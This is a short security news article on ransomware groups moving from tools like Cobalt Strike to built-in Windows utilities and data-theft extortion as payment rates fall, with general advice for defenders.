Ransomware operators are changing tactics as fewer victims pay. New reporting shows attackers are moving away from easily flagged post-exploitation tools such as Cobalt Strike and leaning more on native Windows utilities, while data theft and extortion continue to rise.
According to Dark Reading, the shift reflects a tougher business environment for ransomware groups: payment rates have fallen to record lows, and defenders have become better at spotting common offensive frameworks. In response, attackers are increasingly using built-in Windows features and “living off the land” techniques, including PowerShell, Windows Management Instrumentation, scheduled tasks, and remote administration methods that can blend into normal IT activity.
That tradecraft change matters because it reduces obvious malware signals after initial access. Instead of dropping noisy tools that endpoint products often detect quickly, intruders can abuse legitimate system binaries and admin workflows to move laterally, run commands, and stage data for exfiltration. The result is a harder investigation path for defenders, especially in Windows-heavy enterprise environments where those tools are used every day.
The economic pressure behind the shift is well documented. Coveware has repeatedly reported lower ransomware payment rates and shrinking median payments in recent quarters, while incident responders and government agencies have warned that many groups now prioritize stealing data and threatening leaks over relying on encryption alone. That means organizations may face extortion demands even when systems are restored from backups or encryption is limited.
For defenders, the trend reinforces a familiar lesson: blocking one tool does not stop the intrusion. Security teams need stronger monitoring for suspicious use of PowerShell, WMI, scheduled tasks, remote service creation, and large outbound data transfers. Hardening exposed remote access, especially corporate VPN gateways and RDP services, remains important because many attacks still begin with stolen credentials or exploited edge devices before shifting to native tools inside the network.
The ransomware market is not disappearing. It is adapting. As profits tighten, attackers appear to be trading flashy tooling for quieter methods that are cheaper, harder to detect, and better suited to extortion-first operations.
